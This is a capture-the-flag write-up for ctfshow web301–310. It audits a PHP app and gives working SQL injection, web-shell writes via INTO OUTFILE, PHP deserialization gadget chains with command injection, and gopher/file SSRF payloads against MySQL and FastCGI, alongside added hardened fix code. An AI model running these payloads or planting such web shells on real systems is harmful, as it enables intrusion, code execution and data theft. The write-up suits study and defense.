Ctfshow web entry code audit
2022-07-05 04:03:00 【Sentiment._】
web301
After downloading the source code, the problem code is in checklogin.php:
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
if($result->num_rows<1){
    $_SESSION['error']="1";
    header("location:login.php");
    return;
}
if(!strcasecmp($userpwd,$row['sds_password'])){
    $_SESSION['login']=1;
    $result->free();
    $mysqli->close();
    header("location:index.php");
    return;
}
The SQL statement has no filtering and username is controllable, but below it the strcasecmp function compares the password, so a login only succeeds when the username and password match.
strcasecmp(string1, string2)
string1: required. The first string to compare.
string2: required. The second string to compare.
Return value:
0 if the two strings are equal
<0 if string1 is less than string2
>0 if string1 is greater than string2
So to log in successfully the username and password must match, making strcasecmp return 0, which the ! operator in front of it turns into true and the login succeeds. Here a UNION query can make the query return 1 as sds_password; with userpwd=1 the comparison succeeds, $_SESSION['login']=1 is set, and the session check is bypassed to reach the index.php page.
payload:
userid=1'union select 1#&userpwd=1
This challenge can also be solved in one shot with sqlmap:
python sqlmap.py -u"http://efad7348-9ec6-4684-9f9e-31f3c5d5d1af.challenge.ctf.show/checklogin.php" --data="userid=1&userpwd=1" --batch --dump
A shell can also be written this way:
userid=a ' union select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/a.php"%23&userpwd=b
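A hardened version of the checklogin.php logic above, added here as an example (it is not the challenge's code): it assumes conn.php provides $mysqli as in the challenge, and that sds_password now holds a password_hash() digest rather than a plaintext or md5 value.

```php
<?php
// Added example, not the challenge's code: checklogin.php with both defects fixed.
// Assumes conn.php provides $mysqli as in the challenge, and that sds_password
// now stores a password_hash() digest instead of a plaintext or md5 value.
require_once 'conn.php';

function check_login(mysqli $mysqli, string $username, string $userpwd): bool
{
    // Bound parameter: $username can no longer close the string literal, so
    // "1'union select 1#" is just an odd username that matches no row.
    $stmt = $mysqli->prepare(
        'SELECT sds_password FROM sds_user WHERE sds_username = ? ORDER BY id LIMIT 1'
    );
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Verify against a fixed dummy hash when the user does not exist, so the
    // response time does not reveal which usernames are valid.
    static $dummy = null;
    $dummy ??= password_hash('unused', PASSWORD_DEFAULT);
    $stored = $row['sds_password'] ?? $dummy;

    // strcasecmp() is case-insensitive and stops at the first differing byte;
    // password_verify() is a constant-time check of a salted hash.
    return password_verify($userpwd, $stored) && $row !== null;
}

session_start();
if (check_login($mysqli, $_POST['userid'] ?? '', $_POST['userpwd'] ?? '')) {
    $_SESSION['login'] = 1;
    header('Location: index.php');
} else {
    $_SESSION['error'] = '1';
    header('Location: login.php');
}
// exit, not return: header() only sets a response header, so without exit the
// code after the redirect still runs (the behaviour noted under web308 below).
exit;
```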
web302
The modified part: if(!strcasecmp(sds_decode($userpwd),$row['sds_password']))
Compared with the previous challenge, userpwd has become sds_decode($userpwd). The sds_decode function simply applies nested md5 hashing to its input; 1 becomes d9c77c4e454869d5d8da3b4be79694d3.
payload:
userid=1'union select 'd9c77c4e454869d5d8da3b4be79694d3' #&userpwd=1
Or write a shell directly: even though userpwd goes through sds_decode(), the SQL statement has already been executed by then.
userid=a ' union select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/a.php"%23&userpwd=b
web303
The checklogin.php from before has additional checks, so the injection point there can no longer be used. But the source now also contains dpt.php and dptadd.php, and an injection point is found in dptadd.php. The precondition is a successful login; guessing the weak password admin/admin works.
It is an unfiltered INSERT injection.
payload:
Look up the table names
1',sds_address =(select group_concat(table_name) from information_schema.tables where table_schema=database())#
Look up the column names
1',sds_address =(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')#
Read the data
1',sds_address =(select flag from sds_fl9g)#
web304
A global WAF is added, but the previous challenge's payload still gets through.
web305
A WAF is added, so SQL injection no longer works.
A deserialization point is added in checklogin.php, and a new class.php contains file_put_contents, which can serve as the breakthrough point of this challenge.
poc:
<?php
class user{
    public $username;
    public $password;
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
}
echo urlencode(serialize(new user('2.php','<?php eval($_POST[1]);?>')));
?>
In checklogin.php, pass the value in the user cookie parameter and 2.php is generated.
After connecting with AntSword no flag file was found, so the flag is presumably in the database; try connecting to it. The password and other connection details are in conn.php.
After connecting successfully, the flag is found in the database.
web306
file_put_contents() is found in class.php, but it is only reached by calling the close() method, so the next step is to find where this method is used: dao.php calls it.
With a usage point found, a deserialization entry is needed. Both login.php and index.php contain unserialize, but the PHP file must include dao.php and class.php, so only the deserialization entry in index.php can be used to pass the parameter.
poc:
<?php
class log{
    public $title='1.php';
    public $info='<?php eval($_POST[a]);?>';
}
class dao{
    private $conn;
    public function __construct(){
        $this->conn=new log();
    }
}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6OToiAGRhbwBjb25uIjtPOjM6ImxvZyI6Mjp7czo1OiJ0aXRsZSI7czo1OiIxLnBocCI7czo0OiJpbmZvIjtzOjI0OiI8P3BocCBldmFsKCRfUE9TVFthXSk7Pz4iO319
The credentials are admin/admin1. After logging in you are redirected to the index.php page; pass the payload in the user cookie and 1.php is generated.
web307
In this challenge the close method has become closelog(), so it can no longer be called from the dao class, and a global search finds no other use of dao's close() method either, so another exploitation point is needed.
A Seay source-code audit finds the shell_exec function, which requires calling the clearCache() method. logout.php calls clearCache directly.
In this method config is a variable of the dao class and cache_dir belongs to the login class, so what needs to be done is to modify the value of $this->config->cache_dir in order to execute our command.
poc:
<?php
class config
{
    public $cache_dir = 'cache/*;cat /var/www/html/flag.php > /var/www/html/1.txt;';
}
class dao
{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
$a = new dao();
echo base64_encode(serialize($a));
?>
Pass it in the cookie, then visit 1.txt to get the flag.
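All three chains in web305 to web307 start at an unserialize() of the user cookie. As an added example (not the challenge's code), this is how index.php could read that cookie without letting it choose which classes are instantiated; the first sample input is the dao->log gadget from the web306 poc above, the second is a constructed benign value.

```php
<?php
// Added example, not the challenge's code: reading the "user" cookie that
// checklogin.php/index.php unserialize, without letting the cookie choose which
// classes get instantiated. The first sample is the dao->log gadget from the
// web306 poc above; the second is a constructed benign value.
function load_user_cookie(string $raw): ?array
{
    $data = base64_decode($raw, true);
    if ($data === false) {
        return null;
    }
    // allowed_classes => false turns every O:...:{...} token into
    // __PHP_Incomplete_Class, so dao, log and config are never constructed and
    // no __destruct()/close()/clearCache() runs on the attacker's behalf.
    $value = @unserialize($data, ['allowed_classes' => false]);
    if ($value instanceof __PHP_Incomplete_Class) {
        error_log('rejected serialized object in user cookie: ' . substr($data, 0, 40));
        return null;
    }
    // Accept only a flat array of scalars; anything else is not a session hint.
    if (!is_array($value)) {
        return null;
    }
    foreach ($value as $item) {
        if (!is_scalar($item) && $item !== null) {
            return null;
        }
    }
    return $value;
}

$gadget = 'TzozOiJkYW8iOjE6e3M6OToiAGRhbwBjb25uIjtPOjM6ImxvZyI6Mjp7czo1OiJ0aXRsZSI7czo1OiIxLnBocCI7czo0OiJpbmZvIjtzOjI0OiI8P3BocCBldmFsKCRfUE9TVFthXSk7Pz4iO319';
$benign = base64_encode(serialize(['name' => 'admin', 'theme' => 'dark']));
var_dump(load_user_cookie($gadget));
var_dump(load_user_cookie($benign));
```

The stronger fix is to keep such state in $_SESSION on the server and store only the session id in the cookie, so nothing client-controlled is ever unserialized.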
web308
Compared with the previous challenge, the RCE point is now filtered by a regex that allows only pure letters before the command executes, so this point cannot be used.
But there are new checkVersion() and checkUpdate() methods; following them into fun.php reveals an SSRF point.
config.php shows that the MySQL database has no password, and further down there is an additional url parameter that can be passed along via the checkUpdate() method, so this challenge is presumably about attacking MySQL.
A deserialization entry is found in index.php, and it calls the checkVersion() method, which leads to the SSRF (note: even without logging in, the code after the header redirect still executes normally).
So this challenge requires modifying the values of $this->config and $update_url via the dao and config classes.
According to the challenge hint, writing a shell over gopher is enough:
select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/2.php"
poc
<?php
class config{
public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%32%2e%70%68%70%22%01%00%00%00%01';
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
echo base64_encode(serialize(new dao()));
Pass the parameter to generate 2.php, then look for the flag.
web309
MySQL now has a password. Judging by the response delay over the gopher protocol, the guess is FastCGI:
gopher://127.0.0.1:9000
Continue using Gopherus to construct the payload.
poc:
<?php
class config{
public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%00%F6%06%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH72%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%09SCRIPT_FILENAMEindex.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00H%04%00%3C%3Fphp%20system%28%27cat%20/var/www/html/f%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
echo base64_encode(serialize(new dao()));
Pass the parameter to get the flag.
web310
Still attacking FastCGI, but reading the flag file fails, so look for the flag file's location.
/var/flag is found. Reading it also fails, so flag is presumably a directory and the flag is in a file inside it; read that file.
index.html is found, and reading it gives the flag.
Another approach, learned from Master Yu: read the nginx.conf configuration file.
<?php
class config{
    public $update_url = 'file:///etc/nginx/nginx.conf';
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
$a=new dao();
echo base64_encode(serialize($a));
?>
This yields:
server {
listen 4476;
server_name localhost;
root /var/flag;
index index.html;
Visit port 4476:
<?php
class config{
    public $update_url = 'http://127.0.0.1:4476';
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
$a=new dao();
echo base64_encode(serialize($a));
?>
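web308 to web310 all go through the same sink: checkUpdate() fetching whatever $update_url the deserialized config object carries. As an added example (not the challenge's code), this is the validation the fetch would need; the allowed host update.example.com is an assumed placeholder, and the refused URLs are shortened forms of the ones used above.

```php
<?php
// Added example, not the challenge's code: validating $update_url before
// checkUpdate() fetches it. The allowed host is an assumed placeholder; the
// refused URLs are shortened forms of the ones used against web308-310 above.
function is_safe_update_url(string $url, string $allowedHost): bool
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return false;
    }
    // Scheme allowlist: gopher://, file://, dict:// never reach the fetch at all.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // Host must be the one update server we expect, not whatever the cookie says.
    if (strcasecmp($parts['host'], $allowedHost) !== 0) {
        return false;
    }
    // Resolve (IPv4) and refuse loopback/private/reserved answers, so a rebound DNS
    // record cannot aim the fetch at 127.0.0.1:3306, :9000 or :4476. gethostbyname()
    // returns the name unchanged on failure, which fails the IP filter as well.
    $ip = gethostbyname($parts['host']);
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}
function fetch_update(string $url, string $allowedHost): ?string
{
    if (!is_safe_update_url($url, $allowedHost)) {
        return null;
    }
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,                      // no redirect back to localhost
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS, // enforced by curl too
        CURLOPT_TIMEOUT        => 5,
    ]);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body === false ? null : $body;
}
foreach ([
    'gopher://127.0.0.1:3306/_%a3%00%00%01',   // web308: MySQL
    'gopher://127.0.0.1:9000/_%01%01%00%01',   // web309: FastCGI
    'file:///etc/nginx/nginx.conf',            // web310: config read
    'http://127.0.0.1:4476',                   // web310: internal vhost
] as $url) {
    printf("%-40s %s\n", $url, is_safe_update_url($url, 'update.example.com') ? 'allowed' : 'refused');
}
```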